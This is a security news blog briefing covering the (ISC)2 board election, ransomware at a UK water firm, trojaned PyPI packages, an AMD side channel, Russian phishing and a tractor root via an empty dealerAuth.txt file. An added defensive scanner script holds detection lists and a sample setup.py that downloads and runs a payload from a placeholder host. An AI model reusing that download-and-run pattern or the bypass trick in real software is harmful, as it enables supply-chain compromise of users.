Blog entry by Les Bell

by Les Bell - Wednesday, 17 August 2022, 9:30 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


(ISC)2 Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, points out some glaring flaws in the process:

  • The Board apparently changed the process for nomination after the election was announced.
  • This change was not announced to the membership.
  • Nevertheless 85 people submitted nominations to run, but
  • The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response Thames Water issued a statement via its website stating that it had not suffered a cyber-attack, and instead South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the __init__.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.

The latest discoveries include 12 distinct pieces of malware attributed to the same actor. The malware uses PyInstaller to bundle a malicious application and its dependencies into one package, which is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.
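The common thread in these reports is install-time code that fetches a remote script and executes it. As an added example (not code from this post or from the cited reports), the following AST scan flags that fetch-then-execute pattern in a setup.py or __init__.py; the sets of call names are a heuristic assumption, and the sample setup scripts are constructed for the demonstration and are never executed.

```python
"""Heuristic scan for download-and-run code in Python packaging files."""
import ast

# Assumed call names that fetch remote content and that execute code/processes.
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
EXEC_CALLS = {"exec", "eval", "system", "popen", "run", "call", "check_output", "Popen"}


def _call_name(node):
    """Return the called name, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_source(src):
    """Parse (never run) one source file and return sorted findings.

    'fetch'      - a remote fetch call is present
    'exec'       - code or process execution is present
    'base64'     - base64 decoding, often used to hide a payload URL
    'fetch+exec' - both fetch and exec in the same file (the reported pattern)
    """
    found = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in FETCH_CALLS:
                found.add("fetch")
            elif name in EXEC_CALLS:
                found.add("exec")
            elif name == "b64decode":
                found.add("base64")
    if {"fetch", "exec"} <= found:
        found.add("fetch+exec")
    return sorted(found)


# Constructed sample mimicking the trojaned setup.py; the URL is a placeholder.
SUSPICIOUS_SETUP = '''
from setuptools import setup
import base64, urllib.request, subprocess
url = base64.b64decode(b"aHR0cDovL2V4YW1wbGUuaW52YWxpZC9wYXlsb2FkLnB5").decode()
urllib.request.urlretrieve(url, "/tmp/p.py")
subprocess.Popen(["python", "/tmp/p.py"])
setup(name="innocent-looking-package", version="0.1")
'''

# Constructed sample of an ordinary setup.py with nothing to flag.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="plain-package", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    print("suspicious:", scan_source(SUSPICIOUS_SETUP))
    print("benign:", scan_source(BENIGN_SETUP))
```

Run it over the setup.py and top-level __init__.py of a package before installing; a 'fetch+exec' finding in a setup script warrants manual review, since legitimate installers rarely need to download and run code.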

Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side-channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et al., SQUIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, think tanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshmanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Wednesday, 17 August 2022, 7:42 PM ]